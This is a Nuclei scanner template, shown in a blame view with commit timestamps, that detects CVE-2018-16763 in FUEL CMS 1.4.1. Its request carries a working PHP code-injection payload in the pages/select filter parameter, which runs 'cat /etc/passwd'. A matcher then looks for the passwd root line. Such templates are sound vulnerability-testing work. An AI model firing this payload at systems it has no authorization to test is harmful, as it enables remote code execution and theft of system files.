nuclei-templates/cves/2018/CVE-2018-16763.yaml

36 lines
1007 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-16763
2020-09-06 17:22:32 +00:00
info:
name: FUEL CMS 1.4.1 - Remote Code Execution
2020-09-06 17:22:32 +00:00
author: pikpikcu
2020-09-06 20:55:49 +00:00
severity: critical
description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
reference:
- https://www.exploit-db.com/exploits/47138
- https://www.getfuelcms.com/
- https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
- https://nvd.nist.gov/vuln/detail/CVE-2018-16763
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-16763
cwe-id: CWE-74
tags: cve,cve2018,fuelcms,rce
2020-09-06 17:22:32 +00:00
requests:
- raw:
- |
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
Host: {{Hostname}}
2020-09-06 20:55:49 +00:00
matchers-condition: and
2020-09-06 17:22:32 +00:00
matchers:
- type: status
status:
- 200
2020-09-11 10:50:03 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
# Enhanced by mp on 2022/05/12